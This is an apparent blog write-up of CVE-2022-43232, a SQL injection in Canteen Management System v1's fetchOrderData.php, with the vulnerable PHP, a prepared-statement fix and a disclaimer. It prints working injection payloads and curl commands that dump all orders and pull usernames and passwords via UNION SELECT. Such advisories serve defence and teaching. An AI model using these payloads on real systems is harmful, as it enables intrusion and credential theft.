CVE-2022-43232 - Critical SQL Injection in Canteen Management System v1. – Full Exposure & Exploit Explained

Canteen Management System v1. helps organizations easily manage food orders and transactions in cafeterias and canteens. In late 2022, a dangerous bug—CVE-2022-43232—was found in this system, affecting how it deals with user input. Attackers could use this bug to steal, change, or ruin data stored in the database. In this post, I’ll break down exactly what went wrong, how it works under the hood, and how you can test and fix it. If you’re using this software, this is a must-read!

🔎 What is CVE-2022-43232?

This vulnerability is a classic SQL Injection. The flaw lives in the script /php_action/fetchOrderData.php. Here, the input userid is taken directly from the web request and used unsafely in a SQL query, without any input sanitization or protections.

Where Is the Problem?

When you request order data from the application, it expects a parameter called userid. It uses this value directly in its SQL query, like so:

// fetchOrderData.php
$userid = $_POST['userid'];
$result = $conn->query("SELECT * FROM orders WHERE userid = '$userid'");

🕵️ Proof of Concept (PoC): Exploiting the Bug

Because the code doesn’t escape special characters, an attacker can send special SQL commands to the server as part of the userid. For example, they might send:

userid=' OR 1=1 --

This makes the database see the query as

SELECT * FROM orders WHERE userid = '' OR 1=1 --'

Here, OR 1=1 always returns true. The -- ends the query early. So instead of just showing orders for user , the database gives all orders to the attacker.

You can trigger the flaw with curl or Burp Suite. Here’s a direct sample using curl

curl -X POST -d "userid=' OR 1=1 -- " http://victim.com/php_action/fetchOrderData.php

If the site is vulnerable, this will return all order records.

Extracting User Data

If you want to go further and get the names and passwords from the users table, you can tinker with the query:

curl -X POST -d "userid=' UNION SELECT 1, username, password, 4 FROM users -- " http://victim.com/php_action/fetchOrderData.php

> Note: This assumes the original query has the same number of columns as the users table. You may need to adjust the number of columns to match.

🔗 References & Resources

- Official CVE Record  
- Exploit Database Entry  
- OWASP SQL Injection
- Canteen Management System v1. on SourceForge

Here’s how to fix the code using prepared statements in PHP (mysqli)

// Secure version with prepared statements
$userid = $_POST['userid'];
$stmt = $conn->prepare("SELECT * FROM orders WHERE userid = ?");
$stmt->bind_param("s", $userid);
$stmt->execute();
$result = $stmt->get_result();

📝 Conclusion

CVE-2022-43232 is a serious vulnerability that can be exploited easily by even new hackers. It could allow access to all user orders, and, with clever injection, even more sensitive data. If you’re running Canteen Management System v1., patch it right away, and never build queries with raw user input!

Stay safe, patch early, and always sanitize your inputs!

*This post was written exclusively for tech readers who want actionable information. If you use or manage Canteen Management System, share this post to help keep others safe.*


Disclaimer:  
These details are for educational and defensive purposes only. Do not attack systems you do not own or have permission to test.

Timeline

Published on: 10/28/2022 18:15:00 UTC
Last modified on: 10/28/2022 19:48:00 UTC